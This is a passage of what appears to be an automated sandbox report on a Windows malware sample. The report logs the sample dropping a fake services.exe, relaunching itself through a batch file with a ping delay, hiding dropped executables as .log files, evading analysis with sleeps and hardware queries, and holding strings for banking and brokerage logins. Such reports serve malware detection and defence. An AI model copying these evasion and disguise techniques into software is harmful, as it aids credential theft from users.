                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 595062Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 594734Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 594547Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 594344Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 594135Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 593656Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 593359Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 300000Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 593103Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 592828Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 592484Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 592234Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 591906Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 591625Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 591297Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 590953Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 590562Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 590250Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 589969Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 589689Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 589514Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 589406Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 589271Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 589156Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 589046Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 588925Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 588812Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 588694Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 588272Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 587875Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 587765Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 587654Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 587546Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 587437Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 587328Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 587219Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 587104Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 587000Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 586890Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeWindow / User API: threadDelayed 5511Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeWindow / User API: threadDelayed 4082Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeDropped PE file which has not been started: C:\Users\user\Desktop\YwCJgfGU.logJump to dropped file
                              Source: C:\Windows\InputMethod\CHT\services.exeDropped PE file which has not been started: C:\Users\user\Desktop\naXqXoBw.logJump to dropped file
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeDropped PE file which has not been started: C:\Users\user\Desktop\FsHliKMo.logJump to dropped file
                              Source: C:\Windows\InputMethod\CHT\services.exeDropped PE file which has not been started: C:\Users\user\Desktop\guqIJuAJ.logJump to dropped file
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeDropped PE file which has not been started: C:\Users\user\Desktop\MYoSwDMa.logJump to dropped file
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeDropped PE file which has not been started: C:\Users\user\Desktop\qeFoAUSY.logJump to dropped file
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeDropped PE file which has not been started: C:\Users\user\Desktop\rbhxVUhT.logJump to dropped file
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeDropped PE file which has not been started: C:\Users\user\Desktop\hnCGlIml.logJump to dropped file
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeDropped PE file which has not been started: C:\Users\user\Desktop\iSjOnjPm.logJump to dropped file
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeDropped PE file which has not been started: C:\Users\user\Desktop\XMTJgPHI.logJump to dropped file
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeDropped PE file which has not been started: C:\Users\user\Desktop\MpvkKZGd.logJump to dropped file
                              Source: C:\Windows\InputMethod\CHT\services.exeDropped PE file which has not been started: C:\Users\user\Desktop\BwIEkNWR.logJump to dropped file
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeDropped PE file which has not been started: C:\Users\user\Desktop\QOfJDANU.logJump to dropped file
                              Source: C:\Windows\InputMethod\CHT\services.exeDropped PE file which has not been started: C:\Users\user\Desktop\oXyytoQr.logJump to dropped file
                              Source: C:\Windows\InputMethod\CHT\services.exeDropped PE file which has not been started: C:\Users\user\Desktop\PWGsgpUk.logJump to dropped file
                              Source: C:\Windows\InputMethod\CHT\services.exeDropped PE file which has not been started: C:\Users\user\Desktop\TuCjUNij.logJump to dropped file
                              Source: C:\Windows\InputMethod\CHT\services.exeDropped PE file which has not been started: C:\Users\user\Desktop\HpleNtbG.logJump to dropped file
                              Source: C:\Windows\InputMethod\CHT\services.exeDropped PE file which has not been started: C:\Users\user\Desktop\hrRQfuPE.logJump to dropped file
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeDropped PE file which has not been started: C:\Users\user\Desktop\SRRrZjRP.logJump to dropped file
                              Source: C:\Windows\InputMethod\CHT\services.exeDropped PE file which has not been started: C:\Users\user\Desktop\McDcppqu.logJump to dropped file
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeDropped PE file which has not been started: C:\Users\user\Desktop\QgmbSWHW.logJump to dropped file
                              Source: C:\Windows\InputMethod\CHT\services.exeDropped PE file which has not been started: C:\Users\user\Desktop\wSNFrCZa.logJump to dropped file
                              Source: C:\Windows\InputMethod\CHT\services.exeDropped PE file which has not been started: C:\Users\user\Desktop\HhBLiJAA.logJump to dropped file
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeDropped PE file which has not been started: C:\Users\user\Desktop\olqGOXgZ.logJump to dropped file
                              Source: C:\Windows\InputMethod\CHT\services.exeDropped PE file which has not been started: C:\Users\user\Desktop\TEZjEzBg.logJump to dropped file
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeDropped PE file which has not been started: C:\Users\user\Desktop\udTfrDlO.logJump to dropped file
                              Source: C:\Windows\InputMethod\CHT\services.exeDropped PE file which has not been started: C:\Users\user\Desktop\WLWsZSvc.logJump to dropped file
                              Source: C:\Windows\InputMethod\CHT\services.exeDropped PE file which has not been started: C:\Users\user\Desktop\QKKBSDQi.logJump to dropped file
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeDropped PE file which has not been started: C:\Users\user\Desktop\IzFuDcGk.logJump to dropped file
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeDropped PE file which has not been started: C:\Users\user\Desktop\kdtxsFme.logJump to dropped file
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeDropped PE file which has not been started: C:\Users\user\Desktop\UbnsZBxQ.logJump to dropped file
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeDropped PE file which has not been started: C:\Users\user\Desktop\kuAPHbgg.logJump to dropped file
                              Source: C:\Windows\InputMethod\CHT\services.exeDropped PE file which has not been started: C:\Users\user\Desktop\iosYAuez.logJump to dropped file
                              Source: C:\Windows\InputMethod\CHT\services.exeDropped PE file which has not been started: C:\Users\user\Desktop\lQBpXVWv.logJump to dropped file
                              Source: C:\Windows\InputMethod\CHT\services.exeDropped PE file which has not been started: C:\Users\user\Desktop\DujMFNlM.logJump to dropped file
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeDropped PE file which has not been started: C:\Users\user\Desktop\xLaDTRLB.logJump to dropped file
                              Source: C:\Windows\InputMethod\CHT\services.exeDropped PE file which has not been started: C:\Users\user\Desktop\wwvNdyqX.logJump to dropped file
                              Source: C:\Windows\InputMethod\CHT\services.exeDropped PE file which has not been started: C:\Users\user\Desktop\LozUEcuw.logJump to dropped file
                              Source: C:\Windows\InputMethod\CHT\services.exeDropped PE file which has not been started: C:\Users\user\Desktop\cEzSCxAQ.logJump to dropped file
                              Source: C:\Windows\InputMethod\CHT\services.exeDropped PE file which has not been started: C:\Users\user\Desktop\jkgzQrBD.logJump to dropped file
                              Source: C:\Windows\InputMethod\CHT\services.exeDropped PE file which has not been started: C:\Users\user\Desktop\dBbaXxPL.logJump to dropped file
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeDropped PE file which has not been started: C:\Users\user\Desktop\uMMNchrL.logJump to dropped file
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeDropped PE file which has not been started: C:\Users\user\Desktop\RdNjnWVR.logJump to dropped file
                              Source: C:\Windows\InputMethod\CHT\services.exeDropped PE file which has not been started: C:\Users\user\Desktop\JedTEJPv.logJump to dropped file
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeDropped PE file which has not been started: C:\Users\user\Desktop\EvgdMKxt.logJump to dropped file
                              Source: C:\Windows\InputMethod\CHT\services.exeDropped PE file which has not been started: C:\Users\user\Desktop\sGFWWBqe.logJump to dropped file
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeDropped PE file which has not been started: C:\Users\user\Desktop\fHiQeeRs.logJump to dropped file
                              Source: C:\Windows\InputMethod\CHT\services.exeDropped PE file which has not been started: C:\Users\user\Desktop\SVgCSVvi.logJump to dropped file
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeDropped PE file which has not been started: C:\Users\user\Desktop\KnJCpqCi.logJump to dropped file
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeDropped PE file which has not been started: C:\Users\user\Desktop\qWWWVlrS.logJump to dropped file
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeDropped PE file which has not been started: C:\Users\user\Desktop\dxMPeMlr.logJump to dropped file
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeDropped PE file which has not been started: C:\Users\user\Desktop\BKAMFwmA.logJump to dropped file
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeDropped PE file which has not been started: C:\Users\user\Desktop\piSOkXvU.logJump to dropped file
                              Source: C:\Windows\InputMethod\CHT\services.exeDropped PE file which has not been started: C:\Users\user\Desktop\yGSOdQVY.logJump to dropped file
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exe TID: 6456Thread sleep time: -922337203685477s >= -30000sJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exe TID: 940Thread sleep time: -30000s >= -30000sJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exe TID: 5688Thread sleep time: -12912720851596678s >= -30000sJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exe TID: 5688Thread sleep time: -600000s >= -30000sJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exe TID: 5688Thread sleep time: -599856s >= -30000sJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exe TID: 5688Thread sleep time: -599000s >= -30000sJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exe TID: 5688Thread sleep time: -598406s >= -30000sJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exe TID: 6608Thread sleep time: -18000000s >= -30000sJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exe TID: 5688Thread sleep time: -598047s >= -30000sJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exe TID: 5688Thread sleep time: -597500s >= -30000sJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exe TID: 5688Thread sleep time: -597047s >= -30000sJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exe TID: 5688Thread sleep time: -596688s >= -30000sJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exe TID: 5688Thread sleep time: -596437s >= -30000sJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exe TID: 5688Thread sleep time: -596125s >= -30000sJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exe TID: 5688Thread sleep time: -595938s >= -30000sJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exe TID: 5688Thread sleep time: -595812s >= -30000sJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exe TID: 5688Thread sleep time: -595562s >= -30000sJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exe TID: 5688Thread sleep time: -595297s >= -30000sJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exe TID: 5688Thread sleep time: -595062s >= -30000sJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exe TID: 5688Thread sleep time: -594734s >= -30000sJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exe TID: 5688Thread sleep time: -594547s >= -30000sJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exe TID: 5688Thread sleep time: -594344s >= -30000sJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exe TID: 5688Thread sleep time: -594135s >= -30000sJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exe TID: 5688Thread sleep time: -593656s >= -30000sJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exe TID: 5688Thread sleep time: -593359s >= -30000sJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exe TID: 6608Thread sleep time: -300000s >= -30000sJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exe TID: 5688Thread sleep time: -593103s >= -30000sJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exe TID: 5688Thread sleep time: -592828s >= -30000sJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exe TID: 5688Thread sleep time: -592484s >= -30000sJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exe TID: 5688Thread sleep time: -592234s >= -30000sJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exe TID: 5688Thread sleep time: -591906s >= -30000sJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exe TID: 5688Thread sleep time: -591625s >= -30000sJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exe TID: 5688Thread sleep time: -591297s >= -30000sJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exe TID: 5688Thread sleep time: -590953s >= -30000sJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exe TID: 5688Thread sleep time: -590562s >= -30000sJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exe TID: 5688Thread sleep time: -590250s >= -30000sJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exe TID: 5688Thread sleep time: -589969s >= -30000sJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exe TID: 5688Thread sleep time: -589689s >= -30000sJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exe TID: 5688Thread sleep time: -589514s >= -30000sJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exe TID: 5688Thread sleep time: -589406s >= -30000sJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exe TID: 5688Thread sleep time: -589271s >= -30000sJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exe TID: 5688Thread sleep time: -589156s >= -30000sJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exe TID: 5688Thread sleep time: -589046s >= -30000sJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exe TID: 5688Thread sleep time: -588925s >= -30000sJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exe TID: 5688Thread sleep time: -588812s >= -30000sJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exe TID: 5688Thread sleep time: -588694s >= -30000sJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exe TID: 5688Thread sleep time: -588272s >= -30000sJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exe TID: 5688Thread sleep time: -587875s >= -30000sJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exe TID: 5688Thread sleep time: -587765s >= -30000sJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exe TID: 5688Thread sleep time: -587654s >= -30000sJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exe TID: 5688Thread sleep time: -587546s >= -30000sJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exe TID: 5688Thread sleep time: -587437s >= -30000sJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exe TID: 5688Thread sleep time: -587328s >= -30000sJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exe TID: 5688Thread sleep time: -587219s >= -30000sJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exe TID: 5688Thread sleep time: -587104s >= -30000sJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exe TID: 5688Thread sleep time: -587000s >= -30000sJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exe TID: 5688Thread sleep time: -586890s >= -30000sJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
                              Source: C:\Windows\InputMethod\CHT\services.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
                              Source: C:\Windows\InputMethod\CHT\services.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                              Source: C:\Windows\InputMethod\CHT\services.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\PING.EXELast function: Thread delayed
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 30000Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 600000Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 599856Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 599000Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 598406Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 3600000Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 598047Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 597500Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 597047Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 596688Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 596437Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 596125Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 595938Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 595812Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 595562Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 595297Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 595062Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 594734Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 594547Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 594344Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 594135Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 593656Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 593359Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 300000Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 593103Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 592828Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 592484Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 592234Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 591906Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 591625Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 591297Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 590953Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 590562Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 590250Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 589969Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 589689Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 589514Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 589406Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 589271Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 589156Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 589046Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 588925Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 588812Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 588694Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 588272Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 587875Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 587765Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 587654Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 587546Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 587437Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 587328Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 587219Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 587104Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 587000Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 586890Jump to behavior
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeFile opened: C:\Users\userJump to behavior
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeFile opened: C:\Users\user\AppDataJump to behavior
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                              Source: wE9Ave0HPL.7.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                              Source: wE9Ave0HPL.7.drBinary or memory string: discord.comVMware20,11696428655f
                              Source: wE9Ave0HPL.7.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                              Source: wE9Ave0HPL.7.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                              Source: wE9Ave0HPL.7.drBinary or memory string: global block list test formVMware20,11696428655
                              Source: wE9Ave0HPL.7.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                              Source: wE9Ave0HPL.7.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                              Source: wE9Ave0HPL.7.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                              Source: wE9Ave0HPL.7.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                              Source: wE9Ave0HPL.7.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                              Source: wE9Ave0HPL.7.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                              Source: wE9Ave0HPL.7.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                              Source: wE9Ave0HPL.7.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                              Source: wE9Ave0HPL.7.drBinary or memory string: outlook.office365.comVMware20,11696428655t
                              Source: wE9Ave0HPL.7.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                              Source: services.exe, 00000007.00000002.3378774424.000000001BD9C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                              Source: wE9Ave0HPL.7.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                              Source: wE9Ave0HPL.7.drBinary or memory string: outlook.office.comVMware20,11696428655s
                              Source: wE9Ave0HPL.7.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                              Source: wE9Ave0HPL.7.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
                              Source: wE9Ave0HPL.7.drBinary or memory string: AMC password management pageVMware20,11696428655
                              Source: wE9Ave0HPL.7.drBinary or memory string: tasks.office.comVMware20,11696428655o
                              Source: wE9Ave0HPL.7.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                              Source: wE9Ave0HPL.7.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                              Source: wE9Ave0HPL.7.drBinary or memory string: interactivebrokers.comVMware20,11696428655
                              Source: wE9Ave0HPL.7.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                              Source: wE9Ave0HPL.7.drBinary or memory string: dev.azure.comVMware20,11696428655j
                              Source: wE9Ave0HPL.7.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                              Source: XNPOazHpXF.exe, OfJItdCHnFwJKGdVvarOLqclbfs.exe.0.dr, dllhost.exe.0.dr, XNPOazHpXF.exe.0.dr, services.exe.0.dr, conhost.exe.0.drBinary or memory string: qEmuPae9hmh
                              Source: wE9Ave0HPL.7.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                              Source: wE9Ave0HPL.7.drBinary or memory string: bankofamerica.comVMware20,11696428655x
                              Source: wE9Ave0HPL.7.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                              Source: wE9Ave0HPL.7.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeProcess information queried: ProcessInformationJump to behavior
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeProcess token adjusted: DebugJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeProcess token adjusted: DebugJump to behavior
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeMemory allocated: page read and write | page guardJump to behavior
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\1kuSaYZZpb.bat" Jump to behavior
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhostJump to behavior
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\InputMethod\CHT\services.exe "C:\Windows\InputMethod\CHT\services.exe" Jump to behavior
                              Source: services.exe, 00000007.00000002.3303823064.00000000034D1000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000007.00000002.3303823064.00000000032FB000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000007.00000002.3303823064.00000000035C3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                              Source: services.exe, 00000007.00000002.3303823064.00000000035C3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Managerp
